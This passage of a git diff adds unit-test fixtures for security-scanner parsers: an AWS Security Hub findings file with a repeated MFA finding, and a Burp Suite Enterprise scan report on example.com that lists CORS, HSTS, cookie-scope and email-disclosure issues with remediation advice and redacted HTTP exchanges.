"IAM.5", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation", + "RelatedAWSResources:0/name": "securityhub-mfa-enabled-for-iam-console-access-9ae73a2f", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/awssecurityhub/repeated_findings.json b/unittests/scans/awssecurityhub/repeated_findings.json new file mode 100644 index 00000000000..bcbf1f70314 --- /dev/null +++ b/unittests/scans/awssecurityhub/repeated_findings.json @@ -0,0 +1,132 @@ +{ + "findings": [ + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:33:07.560Z", + "LastObservedAt": "2020-06-14T21:02:53.940Z", + "CreatedAt": "2020-06-08T14:33:07.560Z", + "UpdatedAt": "2020-06-14T21:02:53.454Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "IAM.5 MFA should be enabled for all IAM users that have console password", + "Description": "This AWS control checks whether AWS Multi-Factor Authentication (MFA) is enabled for all AWS Identity and Access Management (IAM) users that use a console password.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": "IAM.5", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation", + "RelatedAWSResources:0/name": "securityhub-mfa-enabled-for-iam-console-access-9ae73a2f", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + }, + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:33:07.560Z", + "LastObservedAt": "2020-06-14T21:02:53.940Z", + "CreatedAt": "2020-06-08T14:33:07.560Z", + "UpdatedAt": "2020-06-14T21:02:53.454Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "IAM.5 MFA should be enabled for all IAM users that have console password", + "Description": "This AWS control checks whether AWS Multi-Factor Authentication (MFA) is enabled for all AWS Identity and Access Management (IAM) users that use a console password.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": "IAM.5", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation", + "RelatedAWSResources:0/name": "securityhub-mfa-enabled-for-iam-console-access-9ae73a2f", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/burp_enterprise/many_vulns.html b/unittests/scans/burp_enterprise/many_vulns.html new file mode 100644 index 00000000000..c6e1512bcb9 --- /dev/null +++ b/unittests/scans/burp_enterprise/many_vulns.html @@ -0,0 +1,2978 @@ + + +Scan Remediation Report #13 + + + + + +
    +
    + +
    +
    +

    Scan Remediation

    +

    Report

    +
    + +
    + +
    +Generated by Burp Suite Enterprise Edition | 2022-06-28 11:03 AM +
    + +
    + + + + + + + +
    +
    Site name:
    +
    https://example.com
    +
    Scanned:
    + + + + + + + + + + + +
    +
    Start:
    +
    +
    2022-06-11 5:00 PM
    +
    +
    End:
    +
    +
    2022-06-12 3:49 AM
    +
    +
    Duration:
    +
    10h 48m
    +
    Status:
    +
    Completed
    +
    +
    Included URLs:
    +
    https://example.com
    + +
    Excluded URLs:
    +
    https://test.example.com
    + +
    Scan configurations:
    +
    Never stop crawl due to application errors
    Never stop audit due to application errors
    Audit coverage - maximum
    + +
    Application logins:
    +
    Testing Credentials
    + +
    Reference:
    + +
    +#13 + Go to scan >> +
    +
    +
    + +
    + + + + + + + +
    +

    Issues by severity

    + + + + + + + + + + + + + + + + + + + + + + + +
    High:1
    Medium:0
    Low:2
    Information:26
    Total issues found:29
    +
    +

    Scan statistics

    + + + + + + + + + + + + + + + + + + + +
    Total scanned URLs:62
    URLs with errors:46
    Requests made:921159
    Network errors:205
    +
    +
    + +
    + +
    +

    Issues found on https://example.com

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    URLs By issue typeSeverityConfidenceMore detail
    Cross-origin resource sharing: arbitrary origin trusted [1]
    HighCertain>>
    Strict transport security not enforced [1]
    LowCertain>>
    Cross-origin resource sharing: unencrypted origin trusted [1]
    LowCertain>>
    TLS certificate [1]
    InfoCertain>>
    Cross-origin resource sharing [1]
    InfoCertain>>
    WAF Detected: redacted [1]
    InfoCertain>>
    Cookie scoped to parent domain [1]
    InfoCertain>>
    Email addresses disclosed [3]
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    Robots.txt file [1]
    InfoCertain>>
    Cacheable HTTPS response [1]
    InfoCertain>>
    User agent-dependent response [7]
    InfoFirm>>
    InfoFirm>>
    InfoFirm>>
    InfoFirm>>
    InfoTentative>>
    InfoTentative>>
    InfoTentative>>
    Cross-site request forgery [1]
    InfoTentative>>
    +
    + +
    +

    Issues found on https://example.com

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    URLs By issue typeSeverityConfidenceMore detail
    Cookie scoped to parent domain [9]
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    InfoCertain>>
    +
    + +
    + +
    +

    More details for https://example.com

    +
    + +
    +
    + +

    Cross-origin resource sharing: arbitrary origin trusted

    +/redacted + +

    Issue detail:

    +
    +The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

    The application allowed access from the requested origin https://llqvfwgbsdau.com +
    + +

    +Issue background +

    +
    +

    An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

    +Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.

    +

    If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.

    +
    + +

    +Issue remediation +

    +
    +

    Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=daed328c5bcfbc7d405794c7b97140aabba4ae88-1654942102 +Origin: https://llqvfwgbsdau.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 4685 + +https://example.com
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 10:08:23 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://llqvfwgbsdau.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 71998b93d9b330a4-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    +
    + +

    Strict transport security not enforced

    +/redacted + +

    Issue detail:

    +
    +This issue was found in multiple locations under the reported path. +
    + +

    +Issue background +

    +
    +

    The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a platform for attacks against its users. This attack is performed by rewriting HTTPS links as HTTP, so that if a targeted user follows a link to the site from an HTTP page, their browser never attempts to use an encrypted connection. The sslstrip tool automates this process.

    +

    +To exploit this vulnerability, an attacker must be suitably positioned to intercept and modify the victim's network traffic.This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

    +
    + +

    +Issue remediation +

    +
    +

    The application should instruct web browsers to only access the application using HTTPS. To do this, enable HTTP Strict Transport Security (HSTS) by adding a response header with the name 'Strict-Transport-Security' and the value 'max-age=expireTime', where expireTime is the time in seconds that browsers should remember that the site should only be accessed using HTTPS. Consider adding the 'includeSubDomains' flag if appropriate.

    +

    Note that because HSTS is a "trust on first use" (TOFU) protocol, a user who has never accessed the application will never have seen the HSTS header, and will therefore still be vulnerable to SSL stripping attacks. To mitigate this risk, you can optionally add the 'preload' flag to the HSTS header, and submit the domain for review by browser vendors.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=239b7646d8e83ceff3a082b1f62dad581f4af8c3-1654931034 +Origin: https://example.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 5077 + +https://example.com
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:03:54 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 71987d577be960bf-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    +
    + +

    Cross-origin resource sharing: unencrypted origin trusted

    +/redacted + +

    Issue detail:

    +
    +The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request which trusts websites accessed using unencrypted communications. +
    + +

    +Issue background +

    +
    +

    An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

    +

    If a site allows interaction from an origin that uses unencrypted HTTP communications, then it is vulnerable to an attacker who is in a position to view and modify a user's unencrypted network traffic. The attacker can control the responses from unencrypted origins, thereby injecting content that is able to interact with the application that publishes the policy. This means that the application is effectively extending trust to all such attackers, thereby undoing much of the benefit of using HTTPS communications.

    +
    + +

    +Issue remediation +

    +
    +

    Only trust origins that use encrypted HTTPS communications.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=ffba0631a3cf20c7fbba942d6291ab754c7fd041-1654934772 +Origin: https://example.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 4720 + +https://example.com
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 08:06:13 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 7198d89ece7d08ff-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    +
    + +

    TLS certificate

    +/ + +

    Issue detail:

    +
    +The server presented a valid, trusted TLS certificate. This issue is purely informational.

    The server presented the following certificates:

    Server certificate

    Issued to:  redacted.com, *.kr.redacted.com
    Issued by:  redacted Inc ECC CA-3
    Valid from:  Mon Apr 18 00:00:00 GMT 2022
    Valid to:  Tue Apr 18 23:59:59 GMT 2023

    Certificate chain #1

    Issued to:  redacted Inc ECC CA-3
    Issued by:  Baltimore CyberTrust Root
    Valid from:  Mon Jan 27 12:48:08 GMT 2020
    Valid to:  Tue Dec 31 23:59:59 GMT 2024

    Certificate chain #2

    Issued to:  Baltimore CyberTrust Root
    Issued by:  Baltimore CyberTrust Root
    Valid from:  Fri May 12 18:46:00 GMT 2000
    Valid to:  Mon May 12 23:59:00 GMT 2025
    +
    + +

    +Issue background +

    +
    +

    TLS (or SSL) helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an TLS certificate that is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, TLS connections to the server will not provide the full protection for which TLS is designed.

    +

    It should be noted that various attacks exist against TLS in general, and in the context of HTTPS web connections in particular. It may be possible for a determined and suitably-positioned attacker to compromise TLS connections without user detection even when a valid TLS certificate is used.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +
    +
    + +
    +
    + +

    Cross-origin resource sharing

    +/redacted + +

    Issue detail:

    +
    +The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request. +
    + +

    +Issue background +

    +
    +

    An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

    If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially retrieve content from the application, and sometimes carry out actions within the security context of the logged in user.

    +

    Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by an attacker to exploit the trust relationship and attack the application that allows access. CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any domains granted access.

    +
    + +

    +Issue remediation +

    +
    +

    Any inappropriate domains should be removed from the CORS policy.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=803af1a277c706c58c208ae27a67bd73f7b31e76-1654934757 +Origin: https://example.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 4727 + +https://example.com
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 08:06:00 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 7198d84b088708ff-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    +
    + +

    WAF Detected: redacted

    +/redacted + +

    Issue origin

    +
    +This issue was generated by the extension: WAFDetect +
    + +

    Issue detail:

    +
    +Fingerprint Details:
    +
    +WAF Type : redacted
    +WAF tech. details : Cloud-based CDN, WAF & DDoS prevention
    +Reference : https://www.redacted.com
    +Matching regex : ^Server: redacted
    +Highlighting keyword : redacted
    +Header-only search? : true +
    + +

    Request:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=419dce148f6ccf578d6a43bbb2c10373caa4b71a-1654931022 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:03:42 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=3744 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-ea0" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 2 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Age: 188 +Expect-Ct: max-age=604800, report-uri="https://report-uri.redacted.com/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/a.nel.redacted.com\/report\/v3?s=zWSKP8pWrwW1sL1b7HEL93ntZ9UEq75YHco1SqKNm0oze3lJUaLse696k3D9qGAqiPmfrYrvh9q%2BzFRxAiHqD5NMsusj1bDl97%2FDe0MUS02nqj560us35UNMX49fpFPbQ5Ok2dyD"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71987d0d9cbf60bf-SEA + +https://example.com
    + +
    +
    + +
    +
    + +

    Cookie scoped to parent domain

    +/robots.txt + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /robots.txt HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:00:32 GMT +Content-Type: text/plain +Last-Modified: Mon, 18 Apr 2022 22:57:57 GMT +Etag: W/"625decf5-43" +Cross-Origin-Opener-Policy: same-origin +Cross-Origin-Embedder-Policy: require-corp +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' static.redactedinsights.com 'unsafe-eval' https://*.smartlook.com https://*.smartlook.cloud; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self' https://*.smartlook.com https://*.smartlook.cloud; frame-ancestors 'none'; form-action 'self'; +Cache-Control: no-store +X-Envoy-Upstream-Service-Time: 1 +X-Content-Type-Options: nosniff +X-Frame-Options: DENY +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Xss-Protection: 1; mode=block +Referrer-Policy: no-referrer +X-Dns-Prefetch-Control: off +Cf-Cache-Status: MISS +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=2Nm81z8201Ew37Q7eTK5zAFr6WzdIiSBDODDHSj7vi%2FLve161cFN%2B7cuS7kE2gpwyzI%2FNidAGvUSI2z9bFA8Ql9wyHjx%2BTfiht6A7Pw%2F2Qwp8a9TnQoA9J2q9ZtmRzD5grCJSUSY"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=3ae282485f38a38817aaed77ac83bc9b6dea168c-1654930832; path=/; domain=.redacted.com; HttpOnly; Secure; SameSite=None +Server: redacted +Cf-Ray: 71987863dc0d08a5-SEA + +# https://www.robotstxt.org/robotstxt.html +User-agent: * +Disallow: +
    + +
    +
    + +
    +
    + +

    Email addresses disclosed

    +/redacted + +

    Issue detail:

    +
    +The following email addresses were disclosed in the response:
    • fake-user@testing.com
    • fake-admin@testing.com
    • support@redacted.com
    • contact@redacted.com
    • support@xijiabrainmap.com
    • u4E3Asupport@xijiabrainmap.com
    • u81F3support@xijiabrainmap.com
    • u81F3contact@xijiabrainmap.com
    +
    + +

    +Issue background +

    +
    +

    The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

    +

    However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

    +
    + +

    +Issue remediation +

    +
    +

    Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

    +

    To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead providing a form that generates the email server-side, protected by a CAPTCHA if necessary.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:00:34 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=1056677 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-101fa5" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 4 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=vRqxYM8JkDo2GbO5Q9oa5Cq9wpBPHZxKtNH2bkqem%2Fu9XdfaxHKOGrOUSoUCwwOwKxL1YQqxWBfXnWi1WWp4oZmPnkEyyWj1ZbKMGUOYBxhWgbHcpRI5%2BwGdG%2Fh0ZRc%2BLZ7%2B6Pi8"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding 